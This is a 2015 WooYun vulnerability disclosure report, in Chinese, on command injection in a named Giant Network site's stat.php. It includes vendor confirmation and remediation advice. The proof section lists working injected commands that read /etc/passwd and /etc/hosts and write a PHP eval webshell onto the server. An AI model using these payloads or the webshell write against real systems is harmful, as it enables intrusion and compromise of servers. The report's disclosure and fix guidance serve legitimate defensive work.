当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(15) 关注此漏洞

缺陷编号: WooYun-2015-142702

漏洞标题: 巨人网络某站命令注入漏洞(真正的命令注入)

相关厂商: 巨人网络

漏洞作者: mosin

提交时间: 2015-09-22 08:23

公开时间: 2015-11-08 06:02

漏洞类型: 命令执行

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签: 远程命令执行 php代码执行 远程代码执行

11人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-22: 细节已通知厂商并且等待厂商处理中
2015-09-24: 厂商已经确认,细节仅向厂商公开
2015-10-04: 细节向核心白帽子及相关领域专家公开
2015-10-14: 细节向普通白帽子公开
2015-10-24: 细节向实习白帽子公开
2015-11-08: 细节向公众公开

简要描述:

男:5块?
女:我不是那种人。
男:50块?
女:你当我是什么人。
男:500块?
女:今晚我是你的人。
男:5000块?
女:今晚别把我当人。
男:50000块?
女:不管你来多少人。
男:500000块?
女:不管来的是不是人!

详细说明:

巨人网络某站存在commend注入漏洞,注入地址:

code 区域
http://ztsj.ztgame.com/stat.php?url=<shell执行命令>



这个命令执行漏洞SQL注入界的危害算是比较大的了。

这个利用起来也比较容易

[email protected]:http://drops.wooyun.org/papers/1018

我一直以来只是在理论上了解命令注入,现在有了事例,可以爽一下了。。。

废话不多说了,开干!



漏洞证明:

1:读取当前目录的文件

code 区域
http://ztsj.ztgame.com/stat.php?url=%27%26ls+%26%27



2.jpg



2:查看当前用户:

权限你们懂得!

code 区域
http://ztsj.ztgame.com/stat.php?url=%27%26whoami%26%27



3.jpg



3:查看etc目录

http://ztsj.ztgame.com/stat.php?url=%27%26ls+/etc+%26%27

7.jpg



4:读取系统帐号

http://ztsj.ztgame.com/stat.php?url=%27%26cat+/etc/passwd+%26%27

4.jpg



5,查看主机

http://ztsj.ztgame.com/stat.php?url=%27%26cat+/etc/hosts+%26%27

1.jpg



5.jpg





如果我们执行写一句话呢?



code 区域
http://ztsj.ztgame.com/stat.php?url=%27%26echo+"<[email protected](\$_POST[wuyun])?>"+>>+php.php+%26%27



写入一句话成功

6.jpg





现在我们来连接一句话:



10.JPG



额,失败了,可能有防火墙,或者只允许内网连接..算了吧,不深入了,点到为止吧

在这里我就不写其他小马了,这么多已经可以说明问题了,最后上传一个php.txt证明一下吧!

8.jpg





修复方案:

PHP命令注入攻击漏洞的防范:

PHP中命令注入攻击漏洞带来的危害和影响很严重。防范命令注入攻击漏洞的存在可以通过以下几种方法。



1. 尽量不要执行外部的应用程序或命令。



2. 使用自定义函数或函数库实现外部应用程序或命令的功能。



3. 在执行system、eval等命令执行功能的函数前,确定参数内容。



4. 使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\’”,双引号“””会被转义为“\””,分号“;”会被转义为“\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。



5. 使用safe_mode_exec_dir执行可执行的文件路径。将php.ini文件中的safe_mode设置为On,然后将允许执行的文件放入一个目录中,并使用safe_mode_exec_dir指定这个可执行的文件路径。这样,在需要执行相应的外部程序时,程序必须在safe_mode_exec_dir指定的目录中才会允许执行,否则执行将失败。



PHP命令注入攻击漏洞是PHP应用程序常见漏洞之一。国内著名的PHP应用程序,如discuz!、dedecms等大型程序在网络中均被公布过存在命令注入攻击漏洞,黑客可以通过命令注入攻击漏洞快速获取网站权限,进而实施挂马、钓鱼等恶意攻击,造成的影响和危害十分巨大。同时,目前PHP语言应用于Web应用程序开发所占比例较大,Web应用程序员应该了解命令注入攻击漏洞的危害,修补程序中可能存在的被黑客利用的漏洞情况,保护网络用户的安全,免受挂马、钓鱼等恶意代码的攻击



详细请参见:

code 区域
http://www.2cto.com/Article/201208/146517.html

版权声明:转载请注明来源 mosin@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-09-24 06:01

厂商回复:

非常感谢您的报告,问题已着手处理,感谢大家对巨人网络业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

登录后才能发表评论,请先 登录